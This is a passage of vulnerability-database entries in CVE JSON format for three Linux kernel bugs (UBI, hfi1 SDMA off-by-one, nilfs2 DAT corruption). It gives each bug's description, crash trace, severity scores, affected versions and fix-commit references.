"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-25739",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-11-07T19:28:47.579694Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-754",
"description": "CWE-754 Improper Check for Unusual or Exceptional Conditions",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-03-14T18:24:22.750Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "create_empty_lvol in drivers/mtd/ubi/vtbl.c in the Linux kernel through 6.7.4 can attempt to allocate zero bytes, and crash, because of a missing check for ubi-\u003eleb_size."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-03-07T17:58:41.904Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://www.spinics.net/lists/kernel/msg5074816.html"
},
{
"url": "https://groups.google.com/g/syzkaller/c/Xl97YcQA4hg"
},
{
"url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=68a24aba7c593eafa8fd00f2f76407b9b32b47a9"
},
{
"name": "[debian-lts-announce] 20240625 [SECURITY] [DLA 3842-1] linux-5.10 security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"name": "[debian-lts-announce] 20240627 [SECURITY] [DLA 3840-1] linux security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"url": "https://web.git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/drivers/mtd/ubi/vtbl.c?h=v6.6.24\u0026id=d1b505c988b7"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2024-25739",
"datePublished": "2024-02-12T00:00:00.000Z",
"dateReserved": "2024-02-12T00:00:00.000Z",
"dateUpdated": "2025-03-14T18:24:22.750Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26766 (GCVE-0-2024-26766)
Vulnerability from cvelistv5
Published
2024-04-03 17:00
Modified
2025-05-04 12:54
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
IB/hfi1: Fix sdma.h tx->num_descs off-by-one error
Unfortunately the commit `fd8958efe877` introduced another error
causing the `descs` array to overflow. This reults in further crashes
easily reproducible by `sendmsg` system call.
[ 1080.836473] general protection fault, probably for non-canonical address 0x400300015528b00a: 0000 [#1] PREEMPT SMP PTI
[ 1080.869326] RIP: 0010:hfi1_ipoib_build_ib_tx_headers.constprop.0+0xe1/0x2b0 [hfi1]
--
[ 1080.974535] Call Trace:
[ 1080.976990] <TASK>
[ 1081.021929] hfi1_ipoib_send_dma_common+0x7a/0x2e0 [hfi1]
[ 1081.027364] hfi1_ipoib_send_dma_list+0x62/0x270 [hfi1]
[ 1081.032633] hfi1_ipoib_send+0x112/0x300 [hfi1]
[ 1081.042001] ipoib_start_xmit+0x2a9/0x2d0 [ib_ipoib]
[ 1081.046978] dev_hard_start_xmit+0xc4/0x210
--
[ 1081.148347] __sys_sendmsg+0x59/0xa0
crash> ipoib_txreq 0xffff9cfeba229f00
struct ipoib_txreq {
txreq = {
list = {
next = 0xffff9cfeba229f00,
prev = 0xffff9cfeba229f00
},
descp = 0xffff9cfeba229f40,
coalesce_buf = 0x0,
wait = 0xffff9cfea4e69a48,
complete = 0xffffffffc0fe0760 <hfi1_ipoib_sdma_complete>,
packet_len = 0x46d,
tlen = 0x0,
num_desc = 0x0,
desc_limit = 0x6,
next_descq_idx = 0x45c,
coalesce_idx = 0x0,
flags = 0x0,
descs = {{
qw = {0x8024000120dffb00, 0x4} # SDMA_DESC0_FIRST_DESC_FLAG (bit 63)
}, {
qw = { 0x3800014231b108, 0x4}
}, {
qw = { 0x310000e4ee0fcf0, 0x8}
}, {
qw = { 0x3000012e9f8000, 0x8}
}, {
qw = { 0x59000dfb9d0000, 0x8}
}, {
qw = { 0x78000e02e40000, 0x8}
}}
},
sdma_hdr = 0x400300015528b000, <<< invalid pointer in the tx request structure
sdma_status = 0x0, SDMA_DESC0_LAST_DESC_FLAG (bit 62)
complete = 0x0,
priv = 0x0,
txq = 0xffff9cfea4e69880,
skb = 0xffff9d099809f400
}
If an SDMA send consists of exactly 6 descriptors and requires dword
padding (in the 7th descriptor), the sdma_txreq descriptor array is not
properly expanded and the packet will overflow into the container
structure. This results in a panic when the send completion runs. The
exact panic varies depending on what elements of the container structure
get corrupted. The fix is to use the correct expression in
_pad_sdma_tx_descs() to test the need to expand the descriptor array.
With this patch the crashes are no longer reproducible and the machine is
stable.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: d1c1ee052d25ca23735eea912f843bc7834781b4 Version: 40ac5cb6cbb01afa40881f78b4d2f559fb7065c4 Version: 6cf8f3d690bb5ad31ef0f41a6206ecf5a068d179 Version: bd57756a7e43c7127d0eca1fc5868e705fd0f7ba Version: eeaf35f4e3b360162081de5e744cf32d6d1b0091 Version: fd8958efe8779d3db19c9124fce593ce681ac709 Version: fd8958efe8779d3db19c9124fce593ce681ac709 Version: fd8958efe8779d3db19c9124fce593ce681ac709 Version: 0ef9594936d1f078e8599a1cf683b052df2bec00 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26766",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-03T18:11:09.801717Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:48:44.178Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.309Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/115b7f3bc1dce590a6851a2dcf23dc1100c49790"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5833024a9856f454a964a198c63a57e59e07baf5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3f38d22e645e2e994979426ea5a35186102ff3c2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/47ae64df23ed1318e27bd9844e135a5e1c0e6e39"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/52dc9a7a573dbf778625a0efca0fca55489f084b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a2fef1d81becf4ff60e1a249477464eae3c3bc2a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9034a1bec35e9f725315a3bb6002ef39666114d9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e6f57c6881916df39db7d95981a8ad2b9c3458d6"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/infiniband/hw/hfi1/sdma.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "115b7f3bc1dce590a6851a2dcf23dc1100c49790",
"status": "affected",
"version": "d1c1ee052d25ca23735eea912f843bc7834781b4",
"versionType": "git"
},
{
"lessThan": "5833024a9856f454a964a198c63a57e59e07baf5",
"status": "affected",
"version": "40ac5cb6cbb01afa40881f78b4d2f559fb7065c4",
"versionType": "git"
},
{
"lessThan": "3f38d22e645e2e994979426ea5a35186102ff3c2",
"status": "affected",
"version": "6cf8f3d690bb5ad31ef0f41a6206ecf5a068d179",
"versionType": "git"
},
{
"lessThan": "47ae64df23ed1318e27bd9844e135a5e1c0e6e39",
"status": "affected",
"version": "bd57756a7e43c7127d0eca1fc5868e705fd0f7ba",
"versionType": "git"
},
{
"lessThan": "52dc9a7a573dbf778625a0efca0fca55489f084b",
"status": "affected",
"version": "eeaf35f4e3b360162081de5e744cf32d6d1b0091",
"versionType": "git"
},
{
"lessThan": "a2fef1d81becf4ff60e1a249477464eae3c3bc2a",
"status": "affected",
"version": "fd8958efe8779d3db19c9124fce593ce681ac709",
"versionType": "git"
},
{
"lessThan": "9034a1bec35e9f725315a3bb6002ef39666114d9",
"status": "affected",
"version": "fd8958efe8779d3db19c9124fce593ce681ac709",
"versionType": "git"
},
{
"lessThan": "e6f57c6881916df39db7d95981a8ad2b9c3458d6",
"status": "affected",
"version": "fd8958efe8779d3db19c9124fce593ce681ac709",
"versionType": "git"
},
{
"status": "affected",
"version": "0ef9594936d1f078e8599a1cf683b052df2bec00",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/infiniband/hw/hfi1/sdma.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.3"
},
{
"lessThan": "6.3",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.308",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.270",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.211",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.150",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.80",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.19",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.308",
"versionStartIncluding": "4.19.291",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.270",
"versionStartIncluding": "5.4.251",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.211",
"versionStartIncluding": "5.10.188",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.150",
"versionStartIncluding": "5.15.99",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.80",
"versionStartIncluding": "6.1.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.19",
"versionStartIncluding": "6.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.7",
"versionStartIncluding": "6.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "6.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.2.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nIB/hfi1: Fix sdma.h tx-\u003enum_descs off-by-one error\n\nUnfortunately the commit `fd8958efe877` introduced another error\ncausing the `descs` array to overflow. This reults in further crashes\neasily reproducible by `sendmsg` system call.\n\n[ 1080.836473] general protection fault, probably for non-canonical address 0x400300015528b00a: 0000 [#1] PREEMPT SMP PTI\n[ 1080.869326] RIP: 0010:hfi1_ipoib_build_ib_tx_headers.constprop.0+0xe1/0x2b0 [hfi1]\n--\n[ 1080.974535] Call Trace:\n[ 1080.976990] \u003cTASK\u003e\n[ 1081.021929] hfi1_ipoib_send_dma_common+0x7a/0x2e0 [hfi1]\n[ 1081.027364] hfi1_ipoib_send_dma_list+0x62/0x270 [hfi1]\n[ 1081.032633] hfi1_ipoib_send+0x112/0x300 [hfi1]\n[ 1081.042001] ipoib_start_xmit+0x2a9/0x2d0 [ib_ipoib]\n[ 1081.046978] dev_hard_start_xmit+0xc4/0x210\n--\n[ 1081.148347] __sys_sendmsg+0x59/0xa0\n\ncrash\u003e ipoib_txreq 0xffff9cfeba229f00\nstruct ipoib_txreq {\n txreq = {\n list = {\n next = 0xffff9cfeba229f00,\n prev = 0xffff9cfeba229f00\n },\n descp = 0xffff9cfeba229f40,\n coalesce_buf = 0x0,\n wait = 0xffff9cfea4e69a48,\n complete = 0xffffffffc0fe0760 \u003chfi1_ipoib_sdma_complete\u003e,\n packet_len = 0x46d,\n tlen = 0x0,\n num_desc = 0x0,\n desc_limit = 0x6,\n next_descq_idx = 0x45c,\n coalesce_idx = 0x0,\n flags = 0x0,\n descs = {{\n qw = {0x8024000120dffb00, 0x4} # SDMA_DESC0_FIRST_DESC_FLAG (bit 63)\n }, {\n qw = { 0x3800014231b108, 0x4}\n }, {\n qw = { 0x310000e4ee0fcf0, 0x8}\n }, {\n qw = { 0x3000012e9f8000, 0x8}\n }, {\n qw = { 0x59000dfb9d0000, 0x8}\n }, {\n qw = { 0x78000e02e40000, 0x8}\n }}\n },\n sdma_hdr = 0x400300015528b000, \u003c\u003c\u003c invalid pointer in the tx request structure\n sdma_status = 0x0, SDMA_DESC0_LAST_DESC_FLAG (bit 62)\n complete = 0x0,\n priv = 0x0,\n txq = 0xffff9cfea4e69880,\n skb = 0xffff9d099809f400\n}\n\nIf an SDMA send consists of exactly 6 descriptors and requires dword\npadding (in the 7th descriptor), the sdma_txreq descriptor array is not\nproperly expanded and the packet will overflow into the container\nstructure. This results in a panic when the send completion runs. The\nexact panic varies depending on what elements of the container structure\nget corrupted. The fix is to use the correct expression in\n_pad_sdma_tx_descs() to test the need to expand the descriptor array.\n\nWith this patch the crashes are no longer reproducible and the machine is\nstable."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:54:42.053Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/115b7f3bc1dce590a6851a2dcf23dc1100c49790"
},
{
"url": "https://git.kernel.org/stable/c/5833024a9856f454a964a198c63a57e59e07baf5"
},
{
"url": "https://git.kernel.org/stable/c/3f38d22e645e2e994979426ea5a35186102ff3c2"
},
{
"url": "https://git.kernel.org/stable/c/47ae64df23ed1318e27bd9844e135a5e1c0e6e39"
},
{
"url": "https://git.kernel.org/stable/c/52dc9a7a573dbf778625a0efca0fca55489f084b"
},
{
"url": "https://git.kernel.org/stable/c/a2fef1d81becf4ff60e1a249477464eae3c3bc2a"
},
{
"url": "https://git.kernel.org/stable/c/9034a1bec35e9f725315a3bb6002ef39666114d9"
},
{
"url": "https://git.kernel.org/stable/c/e6f57c6881916df39db7d95981a8ad2b9c3458d6"
}
],
"title": "IB/hfi1: Fix sdma.h tx-\u003enum_descs off-by-one error",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26766",
"datePublished": "2024-04-03T17:00:48.642Z",
"dateReserved": "2024-02-19T14:20:24.173Z",
"dateUpdated": "2025-05-04T12:54:42.053Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26956 (GCVE-0-2024-26956)
Vulnerability from cvelistv5
Published
2024-05-01 05:18
Modified
2025-05-04 09:00
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
nilfs2: fix failure to detect DAT corruption in btree and direct mappings
Patch series "nilfs2: fix kernel bug at submit_bh_wbc()".
This resolves a kernel BUG reported by syzbot. Since there are two
flaws involved, I've made each one a separate patch.
The first patch alone resolves the syzbot-reported bug, but I think
both fixes should be sent to stable, so I've tagged them as such.
This patch (of 2):
Syzbot has reported a kernel bug in submit_bh_wbc() when writing file data
to a nilfs2 file system whose metadata is corrupted.
There are two flaws involved in this issue.
The first flaw is that when nilfs_get_block() locates a data block using
btree or direct mapping, if the disk address translation routine
nilfs_dat_translate() fails with internal code -ENOENT due to DAT metadata
corruption, it can be passed back to nilfs_get_block(). This causes
nilfs_get_block() to misidentify an existing block as non-existent,
causing both data block lookup and insertion to fail inconsistently.
The second flaw is that nilfs_get_block() returns a successful status in
this inconsistent state. This causes the caller __block_write_begin_int()
or others to request a read even though the buffer is not mapped,
resulting in a BUG_ON check for the BH_Mapped flag in submit_bh_wbc()
failing.
This fixes the first issue by changing the return value to code -EINVAL
when a conversion using DAT fails with code -ENOENT, avoiding the
conflicting condition that leads to the kernel bug described above. Here,
code -EINVAL indicates that metadata corruption was detected during the
block lookup, which will be properly handled as a file system error and
converted to -EIO when passing through the nilfs2 bmap layer.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: c3a7abf06ce719a51139e62a034590be99abbc2c Version: c3a7abf06ce719a51139e62a034590be99abbc2c Version: c3a7abf06ce719a51139e62a034590be99abbc2c Version: c3a7abf06ce719a51139e62a034590be99abbc2c Version: c3a7abf06ce719a51139e62a034590be99abbc2c Version: c3a7abf06ce719a51139e62a034590be99abbc2c Version: c3a7abf06ce719a51139e62a034590be99abbc2c Version: c3a7abf06ce719a51139e62a034590be99abbc2c Version: c3a7abf06ce719a51139e62a034590be99abbc2c |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-26956",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-06T18:55:00.382518Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-04T16:25:30.144Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.748Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b67189690eb4b7ecc84ae16fa1e880e0123eaa35"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9cbe1ad5f4354f4df1445e5f4883983328cd6d8e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c3b5c5c31e723b568f83d8cafab8629d9d830ffb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2e2619ff5d0def4bb6c2037a32a6eaa28dd95c84"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/46b832e09d43b394ac0f6d9485d2b1a06593f0b7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f69e81396aea66304d214f175aa371f1b5578862"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a8e4d098de1c0f4c5c1f2ed4633a860f0da6d713"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/82827ca21e7c8a91384c5baa656f78a5adfa4ab4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f2f26b4a84a0ef41791bd2d70861c8eac748f4ba"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/nilfs2/btree.c",
"fs/nilfs2/direct.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "b67189690eb4b7ecc84ae16fa1e880e0123eaa35",
"status": "affected",
"version": "c3a7abf06ce719a51139e62a034590be99abbc2c",
"versionType": "git"
},
{
"lessThan": "9cbe1ad5f4354f4df1445e5f4883983328cd6d8e",
"status": "affected",
"version": "c3a7abf06ce719a51139e62a034590be99abbc2c",
"versionType": "git"
},
{
"lessThan": "c3b5c5c31e723b568f83d8cafab8629d9d830ffb",
"status": "affected",
"version": "c3a7abf06ce719a51139e62a034590be99abbc2c",
"versionType": "git"
},
{
"lessThan": "2e2619ff5d0def4bb6c2037a32a6eaa28dd95c84",
"status": "affected",
"version": "c3a7abf06ce719a51139e62a034590be99abbc2c",
"versionType": "git"
},
{
"lessThan": "46b832e09d43b394ac0f6d9485d2b1a06593f0b7",
"status": "affected",
"version": "c3a7abf06ce719a51139e62a034590be99abbc2c",
"versionType": "git"
},
{
"lessThan": "f69e81396aea66304d214f175aa371f1b5578862",
"status": "affected",
"version": "c3a7abf06ce719a51139e62a034590be99abbc2c",
"versionType": "git"
},
{
"lessThan": "a8e4d098de1c0f4c5c1f2ed4633a860f0da6d713",
"status": "affected",
"version": "c3a7abf06ce719a51139e62a034590be99abbc2c",
"versionType": "git"
},
{
"lessThan": "82827ca21e7c8a91384c5baa656f78a5adfa4ab4",
"status": "affected",
"version": "c3a7abf06ce719a51139e62a034590be99abbc2c",
"versionType": "git"
},
{
"lessThan": "f2f26b4a84a0ef41791bd2d70861c8eac748f4ba",
"status": "affected",
"version": "c3a7abf06ce719a51139e62a034590be99abbc2c",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/nilfs2/btree.c",
"fs/nilfs2/direct.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.31"
},
{
"lessThan": "2.6.31",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"versionStartIncluding": "2.6.31",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "2.6.31",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "2.6.31",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "2.6.31",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"versionStartIncluding": "2.6.31",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"versionStartIncluding": "2.6.31",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"versionStartIncluding": "2.6.31",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.3",
"versionStartIncluding": "2.6.31",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "2.6.31",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnilfs2: fix failure to detect DAT corruption in btree and direct mappings\n\nPatch series \"nilfs2: fix kernel bug at submit_bh_wbc()\".\n\nThis resolves a kernel BUG reported by syzbot. Since there are two\nflaws involved, I\u0027ve made each one a separate patch.\n\nThe first patch alone resolves the syzbot-reported bug, but I think\nboth fixes should be sent to stable, so I\u0027ve tagged them as such.\n\n\nThis patch (of 2):\n\nSyzbot has reported a kernel bug in submit_bh_wbc() when writing file data\nto a nilfs2 file system whose metadata is corrupted.\n\nThere are two flaws involved in this issue.\n\nThe first flaw is that when nilfs_get_block() locates a data block using\nbtree or direct mapping, if the disk address translation routine\nnilfs_dat_translate() fails with internal code -ENOENT due to DAT metadata\ncorruption, it can be passed back to nilfs_get_block(). This causes\nnilfs_get_block() to misidentify an existing block as non-existent,\ncausing both data block lookup and insertion to fail inconsistently.\n\nThe second flaw is that nilfs_get_block() returns a successful status in\nthis inconsistent state. This causes the caller __block_write_begin_int()\nor others to request a read even though the buffer is not mapped,\nresulting in a BUG_ON check for the BH_Mapped flag in submit_bh_wbc()\nfailing.\n\nThis fixes the first issue by changing the return value to code -EINVAL\nwhen a conversion using DAT fails with code -ENOENT, avoiding the\nconflicting condition that leads to the kernel bug described above. Here,\ncode -EINVAL indicates that metadata corruption was detected during the\nblock lookup, which will be properly handled as a file system error and\nconverted to -EIO when passing through the nilfs2 bmap layer."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:00:39.824Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/b67189690eb4b7ecc84ae16fa1e880e0123eaa35"
},
{
"url": "https://git.kernel.org/stable/c/9cbe1ad5f4354f4df1445e5f4883983328cd6d8e"
},
{
"url": "https://git.kernel.org/stable/c/c3b5c5c31e723b568f83d8cafab8629d9d830ffb"
},
{
"url": "https://git.kernel.org/stable/c/2e2619ff5d0def4bb6c2037a32a6eaa28dd95c84"
},
{
"url": "https://git.kernel.org/stable/c/46b832e09d43b394ac0f6d9485d2b1a06593f0b7"
},
{
"url": "https://git.kernel.org/stable/c/f69e81396aea66304d214f175aa371f1b5578862"
},
{
